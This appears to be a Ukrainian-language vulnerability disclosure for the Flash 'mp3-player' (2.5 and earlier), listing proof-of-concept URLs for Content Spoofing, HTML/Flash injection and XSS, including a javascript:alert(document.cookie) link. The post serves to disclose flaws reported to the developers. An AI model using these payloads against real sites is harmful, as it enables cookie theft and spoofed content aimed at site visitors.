Уразливості в mp3-player
23:53 11.10.201312.08.2013
У травні, 22.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в mp3-player. Про що вже повідомив розробникам веб додатку.
Детальна інформація про уразливості з’явиться пізніше.
11.10.2013
XSS (через Flash Injection) (WASC-08):
http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=xss.swf
В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.
Content Spoofing (Flash Injection) (WASC-12):
http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=http://site2/1.swf
Content Spoofing (Content Injection) (WASC-12):
http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3
Content Spoofing (HTML Injection) (WASC-12):
http://site/path/ump3player_500x70.swf?way=http://site2&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E
XSS (WASC-08):
http://site/path/ump3player_500x70.swf?way=http://site2&comment=+%3Cimg%20src=%27xss.swf%27%3E
В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.
XSS (Strictly social XSS) (WASC-08):
http://site/path/ump3player_500x70.swf?way=http://site2&comment=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Уразливі mp3-player 2.5 та попередні версії.